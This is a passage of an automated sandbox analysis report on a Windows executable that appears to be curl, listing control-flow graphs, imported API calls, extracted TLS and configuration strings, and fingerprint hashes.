c211f-c2128 _errno 668->673 674 c212a-c2133 _errno 673->674 675 c2135-c2138 673->675 674->675 676 c217f-c218d 674->676 675->676 677 c213a-c2151 call d201d 675->677 676->657 680 c2152-c216d call d0b16 677->680 680->676 683 c216f-c217b _errno 680->683 683->680 684 c217d 683->684 684->673
                                        APIs
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C2082
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C20CA
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C20DD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,out of memory,?,?,?,?,?,000C184E), ref: 000C20F9
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000C184E), ref: 000C211F
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000C184E), ref: 000C212A
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C216F
                                        • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,00117138,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C219C
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C21AE
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117138,?,?,00000000,?,?,?,?,?,?,000C184E), ref: 000C21BC
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,000C184E), ref: 000C21CB
                                        • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,000C184E), ref: 000C21D3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,Failed to open the file %s: %s,?,00000000,?,?,?,000C184E), ref: 000C21EA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,000C184E), ref: 000C21F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errno$free$_close_fdopenfopenmallocstrerror
                                        • String ID: %s/%s$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
                                        • API String ID: 2640482070-2634015058
                                        • Opcode ID: 11677caea8d95d31936bb9e006ff50ac4dc0544703ac5d501594a12482132e51
                                        • Instruction ID: 30bd86f5a3dd28bfe3ab71345c65eeb318332135fffcce18b689b1d8b99a6f9f
                                        • Opcode Fuzzy Hash: 11677caea8d95d31936bb9e006ff50ac4dc0544703ac5d501594a12482132e51
                                        • Instruction Fuzzy Hash: 20610171904705EFCB249FA4DC49EAEBBF5FF64310F24852EE911A7A92D7708980CB60

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 685 105aa0-105b11 686 105b13-105b16 685->686 687 105b2a-105b2f 685->687 686->687 688 105b18-105b1e call dd632 686->688 689 105b31-105b33 687->689 690 105b45-105b48 687->690 698 105b23-105b25 688->698 691 105b38-105b40 call dd632 689->691 692 105b51-105b53 690->692 693 105b4a-105b4f 690->693 701 105efa-105efe 691->701 696 105b59-105b5c 692->696 697 105c4d-105c52 692->697 693->691 696->697 702 105b62-105b6f 696->702 700 105c58-105c5a 697->700 697->701 703 105f00-105f04 698->703 700->701 704 105c60-105c62 700->704 701->703 707 105f47-105f4b 701->707 705 105b81-105bb2 realloc 702->705 706 105b71-105b7a 702->706 703->707 708 105f06-105f0a 703->708 709 105c72-105ce3 704->709 710 105c64-105c67 704->710 725 105bb4-105bc9 call dd6ad 705->725 726 105bce-105bda 705->726 706->705 713 105b7c-105b7f 706->713 711 105f55-105f62 707->711 712 105f4d-105f50 707->712 708->707 714 105f0c-105f10 708->714 750 105ce5-105ceb 709->750 751 105cf9-105cfe 709->751 710->709 715 105c69-105c6c 710->715 717 105f94-105f98 711->717 718 105f64-105f92 call 112780 * 2 711->718 712->711 716 105f52 712->716 719 105bdd-105bf4 call ddb77 713->719 714->707 721 105f12-105f25 call d0b38 714->721 715->701 715->709 716->711 728 105fa8-105faa 717->728 729 105f9a-105f9d 717->729 739 105fb4-105fc8 call 110ca6 718->739 733 105bf9-105c03 719->733 737 105f34-105f46 call dd632 721->737 738 105f27-105f2c 721->738 725->698 726->719 731 105fb0-105fb2 728->731 732 105fac-105fae 728->732 729->728 730 105f9f-105fa7 729->730 730->728 731->739 732->731 740 105c05-105c08 733->740 741 105c2f-105c35 733->741 737->707 738->737 745 105f2e-105f32 738->745 748 105c46-105c49 740->748 749 105c0a-105c0d 740->749 752 105c37-105c3b 741->752 753 105c3d 741->753 745->707 748->697 757 105c1e-105c2d call dd632 749->757 758 105c0f-105c1c call dd632 749->758 750->751 759 105ced-105cf3 750->759 760 105d00-105d1d 751->760 761 105d7a-105d7f 751->761 752->748 753->748 762 105c3f-105c42 753->762 757->748 758->748 759->751 767 105e52-105e5c 759->767 768 105d24-105d47 realloc 760->768 769 105d1f-105d22 760->769 765 105d81-105d87 761->765 766 105dac 761->766 762->748 765->766 776 105d89-105d8c 765->776 770 105db0-105db6 766->770 772 105e77-105e9b call da216 call dd632 767->772 773 105e5e-105e65 767->773 787 105e9d-105eb2 call dd6ad 768->787 788 105d4d-105d57 768->788 769->768 771 105d5b-105d5d 769->771 777 105dbc-105dd0 call dd632 770->777 778 105e3d-105e43 770->778 782 105d76 771->782 783 105d5f-105d73 call 112780 771->783 772->701 779 105e67 773->779 780 105e6d 773->780 776->770 785 105d8e-105daa call 112780 776->785 801 105dd2-105dd5 777->801 802 105ddb-105ddf 777->802 792 105e49 778->792 793 105edb-105ee3 778->793 779->780 780->772 782->761 783->782 785->770 806 105eb7 787->806 788->771 792->767 795 105ee5-105ef5 call dd632 793->795 796 105ef6 793->796 795->796 796->701 801->802 801->806 807 105de5-105e29 call dd632 call 1055c7 802->807 808 105ecb-105ed1 802->808 811 105ec1 806->811 807->811 815 105e2f-105e33 807->815 808->793 811->808 815->778
                                        Strings
                                        • schannel: failed to read data from server: %s, xrefs: 00105E8D
                                        • schannel: an unrecoverable error occurred in a prior call, xrefs: 00105B33
                                        • schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 00105C0F
                                        • schannel: server closed the connection, xrefs: 00105EE5
                                        • schannel: Curl_read_plain returned error %d, xrefs: 00105C1F
                                        • schannel: can't renegotiate, an error is pending, xrefs: 00105EB7
                                        • schannel: SSL/TLS connection renegotiated, xrefs: 00105E33
                                        • schannel: server closed abruptly (missing close_notify), xrefs: 00105F34
                                        • schannel: can't renegotiate, encrypted data available, xrefs: 00105ED1
                                        • schannel: server indicated shutdown in a prior call, xrefs: 00105B4A
                                        • schannel: failed to decrypt data, need more data, xrefs: 00105E6D
                                        • schannel: renegotiating SSL/TLS connection, xrefs: 00105DE5
                                        • schannel: unable to re-allocate memory, xrefs: 00105BB8, 00105EA1
                                        • schannel: enough decrypted data is already available, xrefs: 00105B18
                                        • schannel: renegotiation failed, xrefs: 00105EC1
                                        • schannel: remote party requests renegotiation, xrefs: 00105DBC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renegotiate, an error is pending$schannel: can't renegotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                        • API String ID: 0-3083360527
                                        • Opcode ID: f08b2ca548162424c757a590677ae2885934721231432b5bc7cf589d5f03f082
                                        • Instruction ID: 91c7854b90c32b394e56ebfdb12f5832f8460c8b73ed3b6182f649c517b95099
                                        • Opcode Fuzzy Hash: f08b2ca548162424c757a590677ae2885934721231432b5bc7cf589d5f03f082
                                        • Instruction Fuzzy Hash: 15F1A171608B029FDB28CF28D940A6BB7E6BF48310F14452EF4C997681D7B4E894CF96

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 816 cdc15-cdc3d 817 cdc3f-cdc55 call c375a 816->817 818 cdcb0-cdcb3 816->818 827 cdc57-cdc69 fopen 817->827 828 cdc81-cdc8f call cdb81 817->828 819 cdcb5-cdcbb 818->819 820 cdcc6-cdcd2 fopen 818->820 819->820 822 cdcbd-cdcc4 __acrt_iob_func 819->822 823 cdcd3-cdcdd 820->823 822->823 825 ce076 823->825 826 cdce3-cdcf2 823->826 829 ce078 825->829 831 cdcf5-cdd06 call ce08f 826->831 832 cdc7a-cdc7f 827->832 833 cdc6b-cdc75 free 827->833 839 cdca8-cdcae 828->839 840 cdc91-cdca2 call cdb81 828->840 835 ce07f-ce086 free 829->835 841 cdd0c-cdd1e 831->841 842 ce04e-ce061 call d0c88 __acrt_iob_func 831->842 832->826 834 ce089-ce08e 833->834 835->834 839->826 840->825 840->839 844 cdd24-cdd28 841->844 845 ce047 841->845 854 ce06b-ce072 842->854 855 ce063-ce06a fclose 842->855 848 cdd2a-cdd3b call d0a91 844->848 849 cdd53-cdd57 844->849 845->842 858 cdd3d-cdd4b 848->858 859 cdd65-cdd6d 848->859 852 cdd5c-cdd63 849->852 853 cdd59 849->853 852->831 853->852 854->835 856 ce074 854->856 855->854 856->829 858->848 860 cdd4d 858->860 859->860 861 cdd6f-cdd75 859->861 862 cdd50 860->862 861->860 863 cdd77-cdd7d 861->863 862->849 863->860 864 cdd7f-cdd85 863->864 864->860 865 cdd87-cdd8f 864->865 865->862 866 cdd91-cdd99 865->866 867 cdd9c-cdda8 call d0a91 866->867 870 cddaa-cddad 867->870 871 cddc2-cddc4 867->871 872 cddaf-cddb2 870->872 873 cddb9-cddc0 870->873 874 cddc6-cddce 871->874 875 cde02-cde05 871->875 872->871 878 cddb4-cddb7 872->878 873->867 873->871 874->875 879 cddd0 874->879 876 cde85-cde89 875->876 877 cde07-cde0a 875->877 881 cdf0f-cdf13 876->881 882 cde8f-cde97 876->882 880 cde0d-cde12 877->880 878->871 878->873 883 cddd2-cddda 879->883 880->880 884 cde14-cde25 malloc 880->884 885 cdf16-cdf3c call c52d9 881->885 886 cde99-cdea3 882->886 887 cdea5-cdeaa 882->887 888 cdddc-cdde6 883->888 889 cdde8-cdded 883->889 884->845 890 cde2b-cde2f 884->890 900 cdf5c-cdf5f 885->900 901 cdf3e-cdf40 885->901 886->887 892 cdeac-cdeae 886->892 887->882 887->892 888->889 893 cddf9-cde00 888->893 889->875 894 cddef-cddf2 889->894 896 cde31-cde33 890->896 892->881 898 cdeb0-cdeb8 892->898 893->875 893->883 894->893 895 cddf4-cddf7 894->895 895->875 895->893 899 cde79-cde7b 896->899 898->881 902 cdeba 898->902 905 cde7d-cde80 899->905 906 cde35-cde37 899->906 903 cdf61-cdf69 900->903 904 cdfd2-cdfd5 900->904 907 ce025-ce029 901->907 908 cdf46-cdf48 901->908 909 cdebc-cdec7 902->909 903->907 910 cdf6f-cdf73 903->910 913 cdfd8-cdfde 904->913 905->885 906->905 914 cde39-cde3e 906->914 911 ce02b-ce032 free 907->911 912 ce033-ce037 907->912 908->907 915 cdf4e-cdf51 908->915 916 cdec9-cded5 909->916 917 cdee0-cdee2 909->917 910->907 920 cdf79-cdf90 malloc 910->920 911->912 921 ce03f-ce042 912->921 922 ce039-ce03c 912->922 923 cdfed-cdff3 913->923 924 cdfe0-cdfe6 913->924 925 cde74-cde77 914->925 926 cde40-cde48 914->926 915->907 927 cdf57-cdf5a 915->927 916->917 918 cded7-cdede 916->918 917->881 919 cdee4-cdee6 917->919 918->909 918->917 919->881 928 cdee8-cdeea 919->928 929 cdfca-cdfd0 920->929 930 cdf92-cdfc8 call c23fd 920->930 921->852 922->921 923->907 933 cdff5-cdff8 923->933 924->923 931 cdfe8 924->931 925->899 926->899 932 cde4a-cde4d 926->932 927->913 928->881 934 cdeec-cdeee 928->934 929->913 930->907 931->923 936 cde6c 932->936 937 cde4f-cde52 932->937 933->907 938 cdffa-cdffd 933->938 934->881 940 cdef0-cdf0c call c913e 934->940 939 cde6e-cde72 936->939 942 cde68-cde6a 937->942 943 cde54-cde58 937->943 938->907 944 cdfff-ce002 938->944 939->896 940->881 942->939 947 cde5a-cde5e 943->947 948 cde64-cde66 943->948 944->907 945 ce004-ce022 call c8bfc call c913e 944->945 945->907 947->939 951 cde60-cde62 947->951 948->939 951->939
                                        APIs
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00117A20,?,00000000,00000000), ref: 000CDC5D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,000CCE9B,?,000C901E,?), ref: 000CDC6C
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000), ref: 000CDCBE
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CDE1A
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 000CDF7E
                                        Strings
                                        • _curlrc, xrefs: 000CDC94
                                        • .curlrc, xrefs: 000CDC41
                                        • <stdin>, xrefs: 000CDFE8
                                        • %s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 000CDEFC
                                        • %s:%d: warning: '%s' %s, xrefs: 000CE012
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: malloc$__acrt_iob_funcfopenfree
                                        • String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
                                        • API String ID: 2899880627-1529230327
                                        • Opcode ID: 36cb5f27d779e5b08c0755044a5e8bed8eb96b3641a86866b125db7ce6d9d853
                                        • Instruction ID: ceb3c1a100fdd68ef7bb3591cae9cc312f851fda3e60a51648441c1c41594b3a
                                        • Opcode Fuzzy Hash: 36cb5f27d779e5b08c0755044a5e8bed8eb96b3641a86866b125db7ce6d9d853
                                        • Instruction Fuzzy Hash: 1EE10170E002559FDB658FA8D494BFDBBF1AF59300F28407FE482AB292D6758D86CB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 988 c2230-c2279 989 c228b-c228f 988->989 990 c227b-c227f call c1fdc 988->990 992 c22df-c2305 _fileno _get_osfhandle _fileno _isatty 989->992 993 c2291-c2295 989->993 994 c2284-c2286 990->994 995 c230b-c231a GetConsoleScreenBufferInfo 992->995 996 c2392-c23ac fwrite 992->996 993->992 997 c2297 993->997 1000 c2288 994->1000 1001 c22d7-c22da 994->1001 995->996 1002 c231c-c2341 MultiByteToWideChar malloc 995->1002 998 c23ae-c23b1 996->998 999 c23b5-c23bc 996->999 1003 c2299-c22a0 997->1003 1004 c22a2-c22a9 997->1004 998->999 1006 c23be-c23cb call d2378 999->1006 1007 c23d0-c23d7 999->1007 1000->989 1008 c23ee-c23fc call 110ca6 1001->1008 1002->1001 1009 c2343-c235f MultiByteToWideChar 1002->1009 1003->992 1003->1004 1004->992 1005 c22ab-c22b9 call 1133b0 1004->1005 1005->992 1021 c22bb-c22cc call c913e 1005->1021 1006->1007 1012 c23d9-c23e5 fflush 1007->1012 1013 c23eb 1007->1013 1015 c2386-c238d free 1009->1015 1016 c2361-c2374 WriteConsoleW 1009->1016 1012->1001 1012->1013 1013->1008 1020 c22d6 1015->1020 1016->1015 1019 c2376-c2384 free 1016->1019 1019->998 1020->1001 1021->1020
                                        APIs
                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C22E2
                                        • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C22E9
                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C22F6
                                        • _isatty.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C22FD
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 000C2312
                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,00000000), ref: 000C232A
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2336
                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,?), ref: 000C2354
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00000000,?,00000000), ref: 000C236C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2377
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2387
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 000C239E
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C23DC
                                        Strings
                                        • Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 000C22BB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ByteCharConsoleMultiWide_filenofree$BufferInfoScreenWrite_get_osfhandle_isattyfflushfwritemalloc
                                        • String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
                                        • API String ID: 4159644049-3734715646
                                        • Opcode ID: 888220ed9db1a2a28e656175bb30d682ede4772ece4998e7970f0de467158ad3
                                        • Instruction ID: bb62da4a4bca1ad7657546e6c5d150ec68a45b82a146ceefb34a6dec64399ce1
                                        • Opcode Fuzzy Hash: 888220ed9db1a2a28e656175bb30d682ede4772ece4998e7970f0de467158ad3
                                        • Instruction Fuzzy Hash: 77517C71A00606EFDB289FA4D948FEEBBF5BF18310F04402DF805A69A1D7749D80CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1024 ca06f-ca085 fopen 1025 ca0a7-ca0b3 call cd323 1024->1025 1026 ca087-ca08d 1024->1026 1032 ca0db-ca0e6 call d20e6 1025->1032 1033 ca0b5-ca0b8 1025->1033 1026->1025 1027 ca08f-ca0a5 call c9199 1026->1027 1035 ca034-ca038 1027->1035 1041 ca0e9-ca0eb 1032->1041 1033->1032 1036 ca0ba-ca0d9 call d20e6 free 1033->1036 1038 cc5a8-cc5b1 1035->1038 1036->1041 1042 cc5b7-cc5c1 call c9b4c 1038->1042 1043 cc5b3-cc5b5 1038->1043 1044 ca0ed-ca0ef 1041->1044 1045 ca103-ca120 call cd8d0 free 1041->1045 1046 cc5c4-cc5d2 call 110ca6 1042->1046 1043->1042 1043->1046 1048 ca0f9-ca0fe call c9199 1044->1048 1049 ca0f1-ca0f8 fclose 1044->1049 1057 ca12a-ca12e 1045->1057 1058 ca122-ca129 fclose 1045->1058 1061 ca032 1048->1061 1049->1048 1060 ca134-ca142 1057->1060 1057->1061 1058->1057 1062 ca1bc call d2235 1060->1062 1063 ca144-ca147 1060->1063 1061->1035 1070 ca1c1-cc596 call c91ba call e16ca 1062->1070 1065 ca149-ca14f 1063->1065 1066 ca15a-ca170 fopen 1063->1066 1065->1066 1067 ca151-ca158 call c1018 1065->1067 1068 ca1a7-ca1b6 1066->1068 1069 ca172-ca1a2 call c913e free call cfea5 1066->1069 1067->1062 1068->1062 1069->1046 1070->1038 1084 cc598-cc5a5 fclose 1070->1084 1084->1038
                                        APIs
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000CA079
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,If-None-Match: %s,00000000), ref: 000CA0CD
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000CA0F2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CA117
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000CA123
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000CC59E
                                        Strings
                                        • If-None-Match: %s, xrefs: 000CA0BD
                                        • Failed to open %s, xrefs: 000CA095
                                        • If-None-Match: "", xrefs: 000CA0DB
                                        • Failed to allocate memory for custom etag header, xrefs: 000CA0F9
                                        • k%, xrefs: 000CA038
                                        • Failed creating file for saving etags: "%s". Skip this transfer, xrefs: 000CA173
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fclose$free$fopen
                                        • String ID: Failed creating file for saving etags: "%s". Skip this transfer$Failed to allocate memory for custom etag header$Failed to open %s$If-None-Match: ""$If-None-Match: %s$k%
                                        • API String ID: 502121373-281841017
                                        • Opcode ID: df2f727d7d451b437b9146dffba0034e0605927c8f219ddc929c22a80a660874
                                        • Instruction ID: db849cd7b550c32027ecbeb203526d521a248ade8786e35e0f3c8fbf694e58f2
                                        • Opcode Fuzzy Hash: df2f727d7d451b437b9146dffba0034e0605927c8f219ddc929c22a80a660874
                                        • Instruction Fuzzy Hash: CF51C231A04708CFDF28DBA0DC45FED7BF1AF46344F28406EE805AA282EB759981CB11

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1112 104b3e-104b9c 1113 104ba2-104ba5 1112->1113 1114 104f2d 1112->1114 1113->1114 1115 104bab-104bb3 1113->1115 1116 104f2f 1114->1116 1117 104bb5-104bd2 malloc 1115->1117 1118 104bdf-104be4 1115->1118 1119 104f30-104f3e call 110ca6 1116->1119 1129 105122 1117->1129 1130 104bd8-104bda 1117->1130 1120 104be6-104c08 malloc 1118->1120 1121 104c0e-104c1b 1118->1121 1120->1121 1120->1129 1124 104c66 1121->1124 1125 104c1d-104c3f realloc 1121->1125 1128 104c6c-104c6e 1124->1128 1134 104c41-104c55 call dd6ad 1125->1134 1135 104c5a-104c63 1125->1135 1132 104c70-104c91 call ddb77 1128->1132 1133 104cbe-104d6c malloc 1128->1133 1130->1118 1139 104c96-104c9b 1132->1139 1133->1129 1142 104d72-104dea call 112780 free 1133->1142 1134->1116 1135->1124 1140 104ca1-104ca3 1139->1140 1141 104f3f-104f4d 1139->1141 1144 104ca9-104cb1 1140->1144 1145 104f1b-104f2c call dd6ad 1140->1145 1146 104f5a-104f5c 1141->1146 1147 104f4f 1141->1147 1156 104df0-104df6 1142->1156 1157 105102-105112 1142->1157 1144->1145 1149 104cb7-104cba 1144->1149 1145->1114 1146->1119 1147->1146 1149->1133 1158 104e03-104e09 1156->1158 1159 104df8-104dfd 1156->1159 1157->1129 1161 104e13-104e21 1158->1161 1162 104e0b-104e0d 1158->1162 1159->1158 1160 104f5e-104f7d 1159->1160 1160->1146 1164 104e27-104e31 1161->1164 1162->1161 1163 104f7f-104f8c 1162->1163 1167 104ff0-105008 call da216 call dd6ad 1163->1167 1168 104f8e-104f93 1163->1168 1165 104e83-104e88 1164->1165 1166 104e33-104e36 1164->1166 1173 104ea9-104ebc 1165->1173 1174 104e8a-104ea3 1165->1174 1166->1165 1169 104e38-104e59 call dd87f 1166->1169 1192 105010-10502d call dd6ad 1167->1192 1171 104fe1-104fee call da216 1168->1171 1172 104f95-104f9d 1168->1172 1184 104e5e-104e69 1169->1184 1191 104fcc-104fdc call dd6ad 1171->1191 1179 104fc0-104fc7 call da216 1172->1179 1180 104f9f-104fbb call da216 call dd6ad 1172->1180 1173->1164 1175 104ec2-104ec9 1173->1175 1174->1173 1181 105032 1175->1181 1182 104ecf-104ed7 1175->1182 1179->1191 1180->1114 1189 105036-105041 1181->1189 1182->1181 1190 104edd-104ee2 1182->1190 1184->1192 1193 104e6f-104e77 1184->1193 1198 105043-105049 1189->1198 1199 10504e-105050 1189->1199 1190->1189 1201 104ee8-104f0e call 112780 1190->1201 1191->1116 1192->1114 1193->1192 1202 104e7d 1193->1202 1198->1147 1206 105052-105058 1199->1206 1207 105063-10506a 1199->1207 1201->1199 1216 104f14-104f16 1201->1216 1202->1165 1206->1207 1211 105092-105098 1207->1211 1212 10506c-105082 1207->1212 1215 10509e-1050a0 1211->1215 1212->1211 1214 105084-105090 1212->1214 1214->1215 1217 1050a2-1050bc call 106451 1215->1217 1218 1050d6-1050dd 1215->1218 1216->1128 1217->1218 1224 1050be-1050d1 call dd6ad 1217->1224 1218->1146 1219 1050e3-1050e7 1218->1219 1219->1146 1221 1050ed-1050fd call 10f363 1219->1221 1221->1119 1224->1119
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104BCA
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104BFE
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104C39
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00104CD0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 00104DDA
                                          • Part of subcall function 000DDB77: recv.WS2_32(?,?,?,00000000), ref: 000DDB81
                                          • Part of subcall function 000DDB77: WSAGetLastError.WS2_32(?,?,?,00000000), ref: 000DDB8E
                                        Strings
                                        • schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 0010501F
                                        • schannel: unable to allocate memory, xrefs: 00105122
                                        • schannel: %s, xrefs: 00104FC7
                                        • schannel: SNI or certificate check failed: %s, xrefs: 00104FE9
                                        • SSL: public key does not match pinned public key, xrefs: 001050BE
                                        • schannel: unable to re-allocate memory, xrefs: 00104C41
                                        • schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 00104F1B
                                        • schannel: next InitializeSecurityContext failed: %s, xrefs: 00104FA8, 00104FF8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
